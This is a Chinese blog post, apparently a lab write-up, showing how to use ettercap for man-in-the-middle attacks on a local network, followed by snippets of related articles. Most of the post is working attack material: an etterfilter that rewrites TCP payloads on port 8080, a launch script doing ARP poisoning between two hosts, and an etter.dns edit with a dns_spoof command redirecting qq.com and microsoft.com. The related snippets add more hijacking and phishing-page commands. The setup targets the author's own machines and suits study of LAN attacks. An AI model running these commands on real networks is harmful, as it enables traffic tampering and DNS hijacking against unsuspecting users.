Ettercap的命令篡改

于 2024-08-15 11:53:47 发布
阅读量387 收藏 7
点赞数 6
文章标签: ettercap 命令篡改 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17280559/article/details/141218725
版权

文章目录

系统环境
NAME="Ubuntu"
VERSION="20.04.5 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.5 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

install ettercap

sudo apt-get update
sudo apt-get -y install ettercap-common
实验环境

相同局域网内

服务器A:

  • # ip: 192.168.63.199
sudo nc -l 8080

服务器B

  • # ip: 192.168.63.147
sudo nc 192.168.63.199 8080

攻击机

  • # ip: 192.168.63.69

功能测试

TCP命令篡改
编写filter: test_dns.filter
if (ip.proto == TCP) {
    msg("TCP DATA");
    if (tcp.src == 8080 || tcp.dst == 8080) {
        msg("TCP 8080");
        log(DECODED.data, "./decrypted_log");
        if (search(DECODED.data, "1")) {
            DATA.data = "999";
        }
    }
}
编写启动脚本: e_tcp.sh
#!/bin/sh

echo "TCP劫持检测"

echo "重新编译过滤器"
sudo rm -rf dns.ef
sudo etterfilter test_dns.filter -o dns.ef

echo "启动arp欺骗"
ettercap -Tq -i wlp1s0 -M ARP:remote -F dns.ef -w tcp8080.pcap /192.168.63.199// /192.168.63.147//
启动程序
sudo ./e_tcp.sh
成功返回
启动arp欺骗

ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team

Content filters loaded from dns.ef...
Listening on:
wlp1s0 -> 00:21:5D:2D:2D:55
          192.168.63.232/255.255.255.0
          fe80::8ca3:6ca9:3650:cb33/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/all/use_tempaddr is not set to 0.
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/wlp1s0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...

  34 plugins
  42 protocol dissectors
  57 ports monitored
24609 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.63.199 92:D5:E6:B6:A0:A2

 GROUP 2 : 192.168.63.147 EA:56:E0:23:CE:CD
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080

数据传输图

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

DNS命令篡改
修改配置文件
sudo vim /etc/ettercap/etter.conf 将uid和gid改成 0 

# 内容如下
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

sudo vim /etc/ettercap/etter.dns  修改rederect (重定向网站(ip:180.101.50.242))

# redirect it to www.linux.org
#
qq.com             A   180.101.50.242
microsoft.com      A   107.170.40.56 1800
*.microsoft.com    A   107.170.40.56 3600
www.microsoft.com  PTR 107.170.40.56      # Wildcards in PTR are not allowed
#*.com              A   180.101.50.242
启动攻击 : 不指定IP则是全局域网
sudo ettercap -i wlp1s0 -Tq -P dns_spoof -M arp:remote /192.168.63.199// /192.168.63.1//
返回结果:虽然尝试重定向,但是返回的结果还是原数据,暂且失败!

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

qq_17280559
关注
【网络安全】ettercap详细使用
你在看屏幕的同时,屏幕也在注视着你
03-12 9070
ettercap劫持 一、什么是ettercap (1)Ettercap是一款用户用于远方控制的黑客工具,是非常主流的工具之一,简单的来说一下原理吧----所有的物理机执行命令都是通过命令发送给DNS解析,DNS解析命令后,发送给服务器,服务器再发给主机进行响应。 图片来源: https://image.so.com/view?q=dns%E8%A7%A3%E6%9E%90%E8%BF%87%E7%A8%8B&src=tab_www&correct=dns%E8%A7%A3%E6%9E%90
ettercap用法及参数
十五年游戏主程转渗透之路
03-02 4036
ettercap,dns劫持,拦截被劫持用户的浏览信息,ettercap -M arp:remote,driftnet -i eth0
ettercap 命令
weixin_33804582的博客
02-11 785
本地主机:192.168.0.149 目标主机:192.168.0.138 /etc/ettercap/etter.dns,将dns欺骗到本机 ettercap -T -q -i wlan0 -P dns_spoof -M arp // // #攻击目标,网关地址 -T 文本模式 -q 安静模式 P 插件 M 开始中间人 -T 文本模式 -G 图形模式 -D 守护进程 -M中间人 -B双网卡之...
Ettercap的基本使用
qq_44418229的博客
04-06 1万+
1.Ettercap工具介绍 Ettercap是基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换的局域网络 借助Ettercap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输 2.Ettercap劫持用户信息攻击步骤 2.1.启动Ettercap 在kali的终端中输入 ettercap -G 点击右上角的勾号 2.2.扫描局域网内存活的主机 点击左上角的列表,host list ...
使用ettercap进行dns劫持
f_zhangwuji的博客
09-22 1368
使用ettercap对局域网主机进行dns劫持 1.vim /etc/ettercap/etter.dns 配置劫持的域名和重定向的IP 2.开启ettercap,并点hosts->scan for hosts扫描局域网ip 3.网关加到target1,目标机加到target2 4.点击圆形图标,开启arp劫持 5.点击plugins,双击dns劫持。 5.可以看到劫持后目标机访问sina.com成功被重定向到了127.0.0.1 ...
Ettercap网络嗅探工具攻略
酉酉的博客
04-03 2178
简介 Ettercap是一款开源的网络嗅探工具,是实现局域网内中间人攻击的神器,结合众多强大的插件,可以发起ARP欺骗、DNS欺骗、DHCP欺骗、会话劫持、密码嗅探等攻击活动。 4种模式 命令行模式: -T GTK2图形化模式: -G Curess图形化模式: -C 守护进程模式: -D 2种运行方式 UNIFIED(默认):中间人嗅探,此模式下系统内核(kernel)的转发功能默...
使用Ettercap filter进行流量监听和数据篡改
最美的时光
06-26 1万+
简介Ettercap是一个综合性的中间人攻击工具,使用它可以进行ARP欺骗、拦截器、DNS欺骗等操作,本文将介绍使用ettercap的文本模式进行流量监听和代码注入的方式和注意点。
ettercap-0.7.5.tar.gz
03-09
5. **SSL截断**:ettercap能够截断SSL/TLS连接,使得攻击者可以查看或篡改加密的数据。 6. **网络映射**:ettercap可以扫描网络,发现在线设备,提供网络拓扑视图。 7. **实时数据分析**:ettercap的交互式界面可以...
ettercap使用
最新发布
09-16
1. 使用以下命令启动Ettercap,并将其配置为使用ARP欺骗技术攻击远程目标主机: ettercap -Tq -i eth0 /网关/ /目标主机/ -P remote_browser 2. 使用以下命令Ettercap配置为使用ARP欺骗技术劫持整个内网: ...
ettercap-0.6.b.tar.gz
04-13
2. **中间人攻击(Man-in-the-Middle, MITM)**:ettercap可以执行MITM攻击,通过伪装成网络中的一个设备,使得通信双方的数据流经过ettercap,从而可以进行数据篡改、密码嗅探等活动。 3. **协议欺骗**:ettercap...
ettercap 入门学习
luela_hunter的博客
06-02 8972
ettercap入门入门了解ettercap嗅探、中间人攻击的功能 测试环境: ettercap 0.8.2 三台硬件主机位于同局域网,其上的ubuntu虚拟机与主机间的网络采用桥接模式 网关地址为10.0.0.1 主机 功能 IP 主机A 用作服务器端 10.0.10.159 主机B 用作客户端 10.0.10.127 中间人主机C 安装了etterc
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 912
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
渗透工具之Ettercap
qq_49091880的博客
02-10 708
使用工具:Ettercap(综合性的中间人工具) 一、首先要启动apache2服务器 1.命令:systemctl start apache2 2.查看网页目录文件,查看是否准备好相关的网页 命令:cd /var/www/html 3.打开配置Ettercap文件 leafpad /etc/ettercap/etter.dns 4.启动ettercap工具 ettercap -G 5.启动以后打开hosts list (1)将Kali的网关地址添加到target1 (2)将目标IP地址添加到targe...
ARP渗透与攻防(五)之Ettercap劫持用户流量
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-24 3187
EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。ettercap几乎是每个渗透测试人员必备的工具之一。
ettercap 命令行实现dns劫持
alohai的博客
04-24 1412
为了学习dns劫持的实现,我配置了两个虚拟机,其中包括一个kali,以及一个ubuntu,kali的内网ip为:192.168.109.134,ubuntu的内网ip为:192.168.109.158,用namp扫描存活的主机,以及traceroute发现网关为192.168.109.2。 首先下载ettercap,由于我这个是kali系统,所以内部自带有ettercap,目前就不需要使用了。 # apt-cache search ettercap # apt-get install -y etterc
ettercap详细使用教程
热门推荐
星落的博客
05-15 5万+
ettercap简介 ettercap是一款强大的嗅探工具。 ettercap主页面 mitm方法 ARP ARP欺骗 ICMP 发送ICMP数据包重定向到kali,然后由kali转发(只有受害者发出的数据包经过kali) DHCP 发送DHCP数据包,让受害者认为kali是路由器,(只有受害者发...
记录利用ettercap进行简单的arp欺骗和mitm攻击过程
weixin_30718391的博客
08-03 556
方法均来自网络,本人只是记录一下自己操作的过程,大神请无视之~攻击主机平台:kali-linux 被攻击主机:安卓手机192.168.1.107 (在同一局域网内)1.利用ettercap进行arp欺骗:root权限下打开ettercapettercap -C (curses UI) ettercap -G (GTK+ GUI)curses UI工作...
kali实现DNS内网劫持
weixin_45822310的博客
10-12 1771
1.终端输入:systemctl start apache2 启动apach2服务,让准备的网页生效 2.终端输入:cd /var/www/html/ 到网站的根目录下方 终端输入:ls 查看,index.html就是准备好的页面 可以在浏览器输入127.0.0.1查看钓鱼界面 3.终端输入:leafpad /etc/ettercap/etter.dns 配置ettercap的配置文件 4.终端输入:ettercap -G 启动ettercap这个中间人工具 ...
ettercap命令
08-31
以下是使用Ettercap的一些常见命令及其功能: 1. ettercap -T -q -M arp:remote /目标IP/:这个命令用于在网络中进行ARP欺骗攻击,将流量重定向到指定的目标IP。 2. ettercap -T -q -M arp:oneway /目标IP/ /网关...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值